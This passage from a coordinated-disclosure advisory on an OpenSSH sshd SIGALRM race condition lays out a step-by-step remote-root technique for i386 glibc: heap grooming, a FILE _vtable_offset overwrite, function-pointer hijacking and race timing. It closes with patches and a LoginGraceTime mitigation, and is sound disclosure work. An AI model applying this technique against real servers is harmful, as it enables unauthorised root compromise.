 797 | ....
 798 | 4343               void *p = chunk2mem (victim);
 799 | ....
 800 | 4345               return p;
 801 | ------------------------------------------------------------------------
 802 | 
 803 | - If this code path is interrupted by SIGALRM *after* line 4327 but
 804 |   *before* line 4339, then the remainder chunk of this split is already
 805 |   linked into the unsorted list of free chunks (lines 4324-4327), but
 806 |   its size field (mchunk_size) is not yet initialized (line 4339).
 807 | 
 808 | - If we are able to control its size field (through leftovers from
 809 |   previous heap allocations), then we can make this remainder chunk
 810 |   larger and overlap with other heap chunks, and therefore corrupt heap
 811 |   memory when this enlarged, overlapping remainder chunk is eventually
 812 |   malloc()ated and written to (inside the SIGALRM handler).
 813 | 
 814 | Our last question, then, is: given that we do not control anything about
 815 | the malloc() calls inside the SIGALRM handler, what can we overwrite in
 816 | the heap to achieve arbitrary code execution before sshd calls _exit()
 817 | (in sshsigdie())?
 818 | 
 819 | Because __tzfile_read() (inside the SIGALRM handler) malloc()ates a FILE
 820 | structure in the heap (at line 166 above), and because FILE structures
 821 | have a long history of abuse for arbitrary code execution, we decided to
 822 | aim our heap corruption at this FILE structure. This is, however, easier
 823 | said than done: our heap corruption is very limited, and FILE structures
 824 | have been significantly hardened over the years (by IO_validate_vtable()
 825 | and PTR_DEMANGLE(), for example).
 826 | 
 827 | Eventually, we devised the following technique (which seems to be
 828 | specific to the i386 glibc -- the amd64 glibc does not seem to use
 829 | _vtable_offset at all):
 830 | 
 831 | - with our limited heap corruption, we overwrite the _vtable_offset
 832 |   field (a single signed char) of __tzfile_read()'s FILE structure;
 833 | 
 834 | - the glibc's libio functions will therefore look for this FILE
 835 |   structure's vtable pointer (a pointer to an array of function
 836 |   pointers) at a non-zero offset (our overwritten _vtable_offset),
 837 |   instead of the default zero offset;
 838 | 
 839 | - we (attackers) can easily control this fake vtable pointer (through
 840 |   leftovers from previous heap allocations), because the FILE structure
 841 |   around this offset is not explicitly initialized by fopen();
 842 | 
 843 | - to pass the glibc's security checks, our fake vtable pointer must
 844 |   point somewhere into the __libc_IO_vtables section: we decided to
 845 |   point it to the vtable for wide-character streams, _IO_wfile_jumps
 846 |   (i.e., to 0xb761b740, since we assume that the glibc is mapped at
 847 |   address 0xb7400000);
 848 | 
 849 | - as a result, __fread_unlocked() (at line 186 above) calls
 850 |   _IO_wfile_underflow() (instead of _IO_file_underflow()), which calls a
 851 |   function pointer (__fct) that basically comes from a structure whose
 852 |   pointer (_codecvt) is yet another field of the FILE structure;
 853 | 
 854 | - we (attackers) can easily control this _codecvt pointer (through
 855 |   leftovers from previous heap allocations, because this field of the
 856 |   FILE structure is not explicitly initialized by fopen()), which also
 857 |   allows us to control the __fct function pointer.
 858 | 
 859 | In summary, by overwriting a single byte (_vtable_offset) of the FILE
 860 | structure malloc()ated by fopen(), we can call our own __fct function
 861 | pointer and execute arbitrary code during __fread_unlocked().
 862 | 
 863 | ------------------------------------------------------------------------
 864 | Practice
 865 | ------------------------------------------------------------------------
 866 | 
 867 |     I wanted it perfect, no wrinkles in it
 868 |         -- The Interrupters, "In the Mirror"
 869 | 
 870 | To mount this attack against sshd's privileged child, let us first
 871 | imagine the following heap layout (the "XXX"s are "barrier" chunks that
 872 | allow us to make holes in the heap; for example, small memory-leaked
 873 | chunks):
 874 | 
 875 | ---|----------------------------------------------|---|------------|---
 876 | XXX|                  large hole                  |XXX| small hole |XXX
 877 | ---|----------------------------------------------|---|------------|---
 878 |    |                     ~8KB                     |   |    320B    |
 879 | 
 880 | - shortly before sshd receives the SIGALRM, we malloc()ate a ~4KB chunk
 881 |   that splits the large ~8KB hole into two smaller chunks:
 882 | 
 883 | ---|-----------------------|----------------------|---|------------|---
 884 | XXX| large allocated chunk | free remainder chunk |XXX| small hole |XXX
 885 | ---|-----------------------|----------------------|---|------------|---
 886 |    |         ~4KB          |         ~4KB         |   |    320B    |
 887 | 
 888 | - but if this malloc() is interrupted by SIGALRM *after* line 4327 but
 889 |   *before* line 4339, then the remainder chunk of this split is already
 890 |   linked into the unsorted list of free chunks, but its size field is
 891 |   under our control (through leftovers from previous heap allocations),
 892 |   and this artificially enlarged remainder chunk overlaps with the
 893 |   following small hole:
 894 | 
 895 | ---|-----------------------|----------------------|---|------------|---
 896 | XXX| large allocated chunk | real remainder chunk |XXX| small hole |XXX
 897 | ---|-----------------------|----------------------|---|------------|---
 898 |    |         ~4KB          |<------------------------------------->|
 899 |                              artificially enlarged remainder chunk
 900 | 
 901 | - when the SIGALRM handler calls syslog() and hence __tzfile_read(),
 902 |   fopen() malloc()ates the small hole for its FILE structure, and
 903 |   __fread_unlocked() malloc()ates a 4KB read buffer, thereby splitting
 904 |   the enlarged remainder chunk in two (the 4KB read buffer and a small
 905 |   remainder chunk):
 906 | 
 907 | ---|-----------------------|----------------------|---|------------|---
 908 | XXX| large allocated chunk |                      |XXX|    FILE    |XXX
 909 | ---|-----------------------|----------------------|---|--|---------|---
 910 |    |         ~4KB          |<--------------------------->|<------->|
 911 |                                    4KB read buffer        remainder
 912 | 
 913 | - we therefore overwrite parts of the FILE structure with the internal
 914 |   header of this small remainder chunk: more precisely, we overwrite the
 915 |   FILE's _vtable_offset with the third byte of this header's bk field,
 916 |   which is a pointer to the unsorted list of free chunks, 0xb761d7f8
 917 |   (i.e., we overwrite _vtable_offset with 0x61);
 918 | 
 919 | - then, as explained in the "Theory" subsection, __fread_unlocked()
 920 |   calls _IO_wfile_underflow() (instead of _IO_file_underflow()), which
 921 |   calls our own __fct function pointer (through our own _codecvt
 922 |   pointer) and executes our arbitrary code.
 923 | 
 924 |   Note: we have not yet explained how to reliably go from a controlled
 925 |   _codecvt pointer to a controlled __fct function pointer; we will do
 926 |   so, but we must first solve a more pressing problem.
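
As a small illustration of the byte arithmetic above (a sketch only, not
part of the exploit): i386 is little-endian, so the pointer 0xb761d7f8
is stored in memory as the bytes f8 d7 61 b7, and its third byte is
0x61. The helper names below are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Return the byte that a little-endian machine stores at position
 * `index` (0 = first byte in memory) for a 32-bit value. Shifting makes
 * the result independent of the host's own endianness. */
uint8_t byte_in_memory(uint32_t value, unsigned index)
{
    assert(index < 4);
    return (uint8_t)(value >> (8 * index));
}

/* _vtable_offset is a single signed char; 0x61 is below 0x80, so it is
 * read back as the positive offset 97. */
int as_signed_offset(uint8_t raw)
{
    return (int)(signed char)raw;
}
```

With the address quoted in the text, byte_in_memory(0xb761d7f8, 2)
yields 0x61, i.e. a _vtable_offset of +97.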
 927 | 
 928 | Indeed, we learned from our work on older OpenSSH versions that we will
 929 | never win this signal handler race condition if our large race window
 930 | contains only one small race window. Consequently, we implemented the
 931 | following strategy, based on the following heap layout:
 932 | 
 933 | ---|------------|---|------------|---|------------|---|------------|---
 934 | XXX|large hole 1|XXX|small hole 1|XXX|large hole 2|XXX|small hole 2|...
 935 | ---|------------|---|------------|---|------------|---|------------|---
 936 |    |    ~8KB    |   |    320B    |   |    ~8KB    |   |    320B    |
 937 | 
 938 | The last packet that we send to sshd (shortly before the delivery of
 939 | SIGALRM) forces sshd to perform the following sequence of malloc()
 940 | calls: malloc(~4KB), malloc(304), malloc(~4KB), malloc(304), etc.
 941 | 
 942 | 1/ Our first malloc(~4KB) splits the large hole 1 in two:
 943 | 
 944 | - if this first split is interrupted by SIGALRM at the right time, then
 945 |   the fopen() inside the SIGALRM handler malloc()ates the small hole 1
 946 |   for its FILE structure, and we achieve arbitrary code execution as
 947 |   explained above;
 948 | 
 949 | - if not, then we malloc()ate the small hole 1 ourselves with our first
 950 |   malloc(304), and:
 951 | 
 952 | 2/ Our second malloc(~4KB) splits the large hole 2 in two:
 953 | 
 954 | - if this second split is interrupted by SIGALRM at the right time, then
 955 |   the fopen() inside the SIGALRM handler malloc()ates the small hole 2
 956 |   for its FILE structure, and we achieve arbitrary code execution as
 957 |   explained above;
 958 | 
 959 | - if not, then we malloc()ate the small hole 2 ourselves with our second
 960 |   malloc(304), etc.
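
The relationship between the malloc(304) requests and the 320B small
holes can be sketched as follows. This is a simplified model of the
glibc's request-to-chunk-size rounding, assuming a 4-byte size field and
16-byte chunk alignment on i386 (assumptions that are consistent with
the 304 and 320 figures in the text, but are not stated by it); the
macro and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define I386_SIZE_SZ      4u   /* assumed: one 4-byte size field of overhead */
#define I386_MALLOC_ALIGN 16u  /* assumed: chunk sizes are multiples of 16 */
#define I386_MINSIZE      16u  /* assumed: smallest possible chunk */

/* Round a malloc() request up to the size of the chunk that serves it. */
size_t chunk_size_for_request(size_t request)
{
    const size_t mask = I386_MALLOC_ALIGN - 1;

    assert(request <= (size_t)-1 - I386_SIZE_SZ - mask); /* no overflow */
    size_t size = (request + I386_SIZE_SZ + mask) & ~mask;
    return size < I386_MINSIZE ? I386_MINSIZE : size;
}
```

Under these assumptions, a 304-byte request is served by a 320-byte
chunk, which is why a malloc(304) fits a 320B hole exactly.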
 961 | 
 962 | We were able to make 27 pairs of such large and small holes in sshd's
 963 | heap (28 would exceed PACKET_MAX_SIZE, 256KB): our large race window now
 964 | contains 27 small race windows! Achieving this complex heap layout was
 965 | extremely painful and time-consuming, but the two highlights are:
 966 | 
 967 | - We abuse sshd's public-key parsing code to perform arbitrary sequences
 968 |   of malloc() and free() calls (at lines 1805 and 573):
 969 | 
 970 | ------------------------------------------------------------------------
 971 | 1754 cert_parse(struct sshbuf *b, struct sshkey *key, struct sshbuf *certbuf)
 972 | 1755 {
 973 | ....
 974 | 1797         while (sshbuf_len(principals) > 0) {
 975 | ....
 976 | 1805                 if ((ret = sshbuf_get_cstring(principals, &principal,
 977 | ....
 978 | 1820                 key->cert->principals[key->cert->nprincipals++] = principal;
 979 | 1821         }
 980 | ------------------------------------------------------------------------
 981 |  562 cert_free(struct sshkey_cert *cert)
 982 |  563 {
 983 |  ...
 984 |  572         for (i = 0; i < cert->nprincipals; i++)
 985 |  573                 free(cert->principals[i]);
 986 | ------------------------------------------------------------------------
 987 | 
 988 | - We were unable to find a memory leak for our small "barrier" chunks;
 989 |   instead, we use tcache chunks (which are never really freed, because
 990 |   their inuse bit is never cleared) as makeshift "barrier" chunks.
 991 | 
 992 | To reliably achieve this heap layout, we send five different public-key
 993 | packets to sshd (packets a/ to d/ can be sent long before SIGALRM; most
 994 | of packet e/ can also be sent long before SIGALRM, but its very last
 995 | byte must be sent at the very last moment):
 996 | 
 997 | a/ We malloc()ate and free() a variety of tcache chunks, to ensure that
 998 | the heap allocations that we do not control end up in these tcache
 999 | chunks and do not interfere with our careful heap layout.
1000 | 
1001 | b/ We malloc()ate and free() chunks of various sizes, to make our 27
1002 | pairs of large and small holes (and the corresponding "barrier" chunks).
1003 | 
1004 | c/ We malloc()ate and free() ~4KB chunks and 320B chunks, to:
1005 | 
1006 | - write the fake header (the large size field) of our potentially
1007 |   enlarged remainder chunk, into the middle of our large holes;
1008 | 
1009 | - write the fake footer of our potentially enlarged remainder chunk, to
1010 |   the end of our small holes (to pass the glibc's security checks);
1011 | 
1012 | - write our fake vtable and _codecvt pointers, into our small holes
1013 |   (which are potential FILE structures).
1014 | 
1015 | d/ We malloc()ate and free() one very large string (nearly 256KB), to
1016 | ensure that our large and small holes are removed from the unsorted list
1017 | of free chunks and placed into their respective malloc bins.
1018 | 
1019 | e/ We force sshd to perform our final sequence of malloc() calls
1020 | (malloc(~4KB), malloc(304), malloc(~4KB), malloc(304), etc.), to open our
1021 | 27 small race windows.
1022 | 
1023 | Attentive readers may have noticed that we have still not addressed
1024 | (literally and figuratively) the problem of _codecvt. In fact, _codecvt
1025 | is a pointer to a structure (_IO_codecvt) that contains a pointer to a
1026 | structure (__gconv_step) that contains the __fct function pointer that
1027 | allows us to execute arbitrary code. To reliably control __fct through
1028 | _codecvt, we simply point _codecvt to one of the glibc's malloc bins,
1029 | which conveniently contains a pointer to one of our free chunks in the
1030 | heap, which contains our own __fct function pointer to arbitrary glibc
1031 | code (all of these glibc addresses are known to us, because we assume
1032 | that the glibc is mapped at address 0xb7400000).
1033 | 
1034 | ------------------------------------------------------------------------
1035 | Timing
1036 | ------------------------------------------------------------------------
1037 | 
1038 |     We're running out of time
1039 |         -- The Interrupters, "As We Live"
1040 | 
1041 | As we implemented this third exploit, it became clear that we could not
1042 | simply re-use the timing strategy that we had used against the two older
1043 | OpenSSH versions: we were never winning this new race condition.
1044 | Eventually, we understood why:
1045 | 
1046 | - It takes a long time (~10ms) for sshd to parse our fifth and last
1047 |   public key (packet e/ above); in other words, our large race window is
1048 |   too large (our 27 small race windows are like needles in a haystack).
1049 | 
1050 | - The user_specific_delay() that was introduced recently (OpenSSH 7.8p1)
1051 |   delays sshd's response to our last public-key packet by up to ~9ms and
1052 |   therefore destroys our feedback-based timing strategy.
1053 | 
1054 | As a result, we developed a completely different timing strategy:
1055 | 
1056 | - from time to time, we send our last public-key packet with a little
1057 |   mistake that produces an error response (lines 138-142 below), right
1058 |   before the call to sshkey_from_blob() that parses our public key;
1059 | 
1060 | - from time to time, we send our last public-key packet with another
1061 |   little mistake that produces an error response (lines 151-155 below),
1062 |   right after the call to sshkey_from_blob() that parses our public key;
1063 | 
1064 | - the difference between these two response times is the time that it
1065 |   takes for sshd to parse our last public key, and this allows us to
1066 |   precisely time the transmission of our last packets (to ensure that
1067 |   sshd has the time to parse our public key in the unprivileged child,
1068 |   send it to the privileged child, and start to parse it there, before
1069 |   the delivery of SIGALRM).
1070 | 
1071 | ------------------------------------------------------------------------
1072 |  88 userauth_pubkey(struct ssh *ssh, const char *method)
1073 |  89 {
1074 | ...
1075 | 138         if (pktype == KEY_UNSPEC) {
1076 | 139                 /* this is perfectly legal */
1077 | 140                 verbose_f("unsupported public key algorithm: %s", pkalg);
1078 | 141                 goto done;
1079 | 142         }
1080 | 143         if ((r = sshkey_from_blob(pkblob, blen, &key)) != 0) {
1081 | 144                 error_fr(r, "parse key");
1082 | 145                 goto done;
1083 | 146         }
1084 | ...
1085 | 151         if (key->type != pktype) {
1086 | 152                 error_f("type mismatch for decoded key "
1087 | 153                     "(received %d, expected %d)", key->type, pktype);
1088 | 154                 goto done;
1089 | 155         }
1090 | ------------------------------------------------------------------------
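
The subtraction described above can be sketched as plain arithmetic on
two sets of measured response times. This is only an illustration: the
function names are hypothetical, and the use of a median (to dampen
jitter) is an assumption, not something the text specifies.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* qsort() comparator for doubles. */
static int cmp_double(const void *a, const void *b)
{
    double x = *(const double *)a, y = *(const double *)b;
    return (x > y) - (x < y);
}

/* Median of n samples (n >= 1); the caller's array is left untouched. */
static double median(const double *samples, size_t n)
{
    assert(n > 0);
    double *copy = malloc(n * sizeof *copy);
    assert(copy != NULL);
    memcpy(copy, samples, n * sizeof *copy);
    qsort(copy, n, sizeof *copy, cmp_double);
    double m = (n % 2) ? copy[n / 2]
                       : (copy[n / 2 - 1] + copy[n / 2]) / 2.0;
    free(copy);
    return m;
}

/* early_ms: response times for the error raised before the key is parsed.
 * late_ms:  response times for the error raised after the key is parsed.
 * The difference estimates the time spent parsing the key. */
double estimate_parse_ms(const double *early_ms, size_t n_early,
                         const double *late_ms, size_t n_late)
{
    return median(late_ms, n_late) - median(early_ms, n_early);
}
```

For example, early samples around 1ms and late samples around 11ms give
an estimate of about 10ms, in line with the ~10ms parsing time mentioned
earlier in this subsection.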
1091 | 
1092 | With this change in strategy, it takes ~10,000 tries on average to win
1093 | the race condition; i.e., with 100 connections (MaxStartups) accepted
1094 | per 120 seconds (LoginGraceTime), it takes ~3-4 hours on average to win
1095 | the race condition, and ~6-8 hours to obtain a remote root shell
1096 | (because of ASLR).
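
The ~3-4 hours figure follows directly from the numbers above; the
sketch below only reproduces that arithmetic (the function name is
hypothetical). Doubling the result to ~6-8 hours is consistent with the
glibc's address being guessed correctly about half of the time, which is
an assumption here since this passage only says "because of ASLR".

```c
#include <assert.h>

/* Expected wall-clock hours to make `tries` attempts when the server
 * accepts `conns_per_window` connections every `window_seconds`. */
double expected_hours(double tries, double conns_per_window,
                      double window_seconds)
{
    assert(conns_per_window > 0.0);
    return tries / conns_per_window * window_seconds / 3600.0;
}
```

With 10,000 tries, 100 connections (MaxStartups), and 120 seconds
(LoginGraceTime), this gives 12,000 seconds, i.e. roughly 3.3 hours.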
1097 | 
1098 | 
1099 | ========================================================================
1100 | Towards an amd64 exploit
1101 | ========================================================================
1102 | 
1103 |     What's your plan for tomorrow?
1104 |         -- The Interrupters, "Take Back the Power"
1105 | 
1106 | We decided to target Rocky Linux 9 (a Red Hat Enterprise Linux 9
1107 | derivative), from "Rocky-9.4-x86_64-minimal.iso", for two reasons:
1108 | 
1109 | - its OpenSSH version (8.7p1) is vulnerable to this signal handler race
1110 |   condition and its glibc is always mapped at a multiple of 2MB (because
1111 |   of the ASLR weakness discussed in the previous "Theory" subsection),
1112 |   which makes partial pointer overwrites much more powerful;
1113 | 
1114 | - the syslog() function (which is async-signal-unsafe but is called by
1115 |   sshd's SIGALRM handler) of this glibc version (2.34) internally calls
1116 |   __open_memstream(), which malloc()ates a FILE structure in the heap,
1117 |   and also calls calloc(), realloc(), and free() (which gives us some
1118 |   much-needed freedom).
1119 | 
1120 | With a heap corruption as a primitive, two FILE structures malloc()ated
1121 | in the heap, and 21 fixed bits in the glibc's addresses, we believe that
1122 | this signal handler race condition is exploitable on amd64 (probably not
1123 | in ~6-8 hours, but hopefully in less than a week). Only time will tell.
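
The "21 fixed bits" follow from the 2MB alignment: 2MB is 2^21 bytes, so
the low 21 bits of a 2MB-aligned base address are always zero. A minimal
sketch of that arithmetic (the function names, and the example address
in the note below, are hypothetical):

```c
#include <assert.h>
#include <stdint.h>

/* Number of low address bits that are fixed (zero) when a mapping is
 * aligned to `alignment`, which must be a power of two. */
unsigned fixed_low_bits(uint64_t alignment)
{
    assert(alignment != 0 && (alignment & (alignment - 1)) == 0);
    unsigned bits = 0;
    while (alignment > 1) {
        alignment >>= 1;
        bits++;
    }
    return bits;
}

/* Non-zero if `addr` is a multiple of the power-of-two `alignment`. */
int is_aligned(uint64_t addr, uint64_t alignment)
{
    return (addr & (alignment - 1)) == 0;
}
```

For a 2MB alignment, fixed_low_bits() returns 21, and a made-up base
address such as 0x7f1234600000 passes is_aligned().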
1124 | 
1125 | Side note: we discovered that Ubuntu 24.04 does not re-randomize the
1126 | ASLR of its sshd children (it is randomized only once, at boot time); we
1127 | tracked this down to the patch below, which turns off sshd's rexec_flag.
1128 | This is generally a bad idea, but in the particular case of this signal
1129 | handler race condition, it prevents sshd from being exploitable: the
1130 | syslog() inside the SIGALRM handler does not call any of the malloc
1131 | functions, because it is never the very first call to syslog().
1132 | 
1133 |   https://git.launchpad.net/ubuntu/+source/openssh/tree/debian/patches/systemd-socket-activation.patch
1134 | 
1135 | 
1136 | ========================================================================
1137 | Patches and mitigation
1138 | ========================================================================
1139 | 
1140 |     The storm has come and gone
1141 |         -- The Interrupters, "Good Things"
1142 | 
1143 | On June 6, 2024, this signal handler race condition was fixed by commit
1144 | 81c1099 ("Add a facility to sshd(8) to penalise particular problematic
1145 | client behaviours"), which moved the async-signal-unsafe code from
1146 | sshd's SIGALRM handler to sshd's listener process, where it can be
1147 | handled synchronously:
1148 | 
1149 |   https://github.com/openssh/openssh-portable/commit/81c1099d22b81ebfd20a334ce986c4f753b0db29
1150 | 
1151 | Because this fix is part of a large commit (81c1099), on top of an even
1152 | larger defense-in-depth commit (03e3de4, "Start the process of splitting
1153 | sshd into separate binaries"), it might prove difficult to backport. In
1154 | that case, the signal handler race condition itself can be fixed by
1155 | removing or commenting out the async-signal-unsafe code from the
1156 | sshsigdie() function; for example:
1157 | 
1158 | ------------------------------------------------------------------------
1159 | sshsigdie(const char *file, const char *func, int line, int showfunc,
1160 |     LogLevel level, const char *suffix, const char *fmt, ...)
1161 | {
1162 | #if 0
1163 |         va_list args;
1164 | 
1165 |         va_start(args, fmt);
1166 |         sshlogv(file, func, line, showfunc, SYSLOG_LEVEL_FATAL,
1167 |             suffix, fmt, args);
1168 |         va_end(args);
1169 | #endif
1170 |         _exit(1);
1171 | }
1172 | ------------------------------------------------------------------------
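
For comparison, the general pattern for a handler that stays
async-signal-safe is to do nothing in it except set a flag (or call
functions such as _exit() or write()), and to leave logging to the main
flow of the program. The sketch below illustrates that pattern only; it
is not OpenSSH's actual fix, and all names in it are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <signal.h>
#include <string.h>

/* The only state the handler touches: a flag of a type that can be
 * written atomically with respect to signal delivery. */
static volatile sig_atomic_t grace_expired = 0;

/* Handler: no syslog(), no malloc(), no stdio; just record the event. */
static void on_alarm(int signo)
{
    (void)signo;
    grace_expired = 1;
}

/* Install the handler for SIGALRM; returns 0 on success, -1 on error. */
int install_alarm_handler(void)
{
    struct sigaction sa;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_alarm;
    sigemptyset(&sa.sa_mask);
    return sigaction(SIGALRM, &sa, NULL);
}

/* Polled from normal (non-signal) context, where logging is safe. */
int grace_time_expired(void)
{
    return grace_expired != 0;
}

/* Usage sketch: deliver SIGALRM to ourselves, then check the flag. */
int demo_alarm_roundtrip(void)
{
    int rc = install_alarm_handler();

    assert(rc == 0);
    (void)rc;
    raise(SIGALRM);
    return grace_time_expired();
}
```

The design choice is that any unsafe work (formatting, logging, memory
allocation) happens after grace_time_expired() is observed in the main
flow, never inside the handler itself.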
1173 | 
1174 | Finally, if sshd cannot be updated or recompiled, this signal handler
1175 | race condition can be fixed by simply setting LoginGraceTime to 0 in the
1176 | configuration file. This makes sshd vulnerable to a denial of service
1177 | (the exhaustion of all MaxStartups connections), but it makes it safe
1178 | from the remote code execution presented in this advisory.
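
As a configuration sketch of this mitigation (the file path is the usual
default and may differ on a given system):

```
# /etc/ssh/sshd_config
LoginGraceTime 0
```

The configuration can be checked with "sshd -t" before sshd is reloaded.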
1179 | 
1180 | 
1181 | ========================================================================
1182 | Acknowledgments
1183 | ========================================================================
1184 | 
1185 | We thank OpenSSH's developers for their outstanding work and close
1186 | collaboration on this release. We also thank the distros@openwall list.
1187 | Finally, we dedicate this advisory to Sophia d'Antoine.
1188 | 
1189 | 
1190 | ========================================================================
1191 | Timeline
1192 | ========================================================================
1193 | 
1194 | 2024-05-19: We contacted OpenSSH's developers. Successive iterations of
1195 | patches and patch reviews followed.
1196 | 
1197 | 2024-06-20: We contacted the distros@openwall list.
1198 | 
1199 | 2024-07-01: Coordinated Release Date.


--------------------------------------------------------------------------------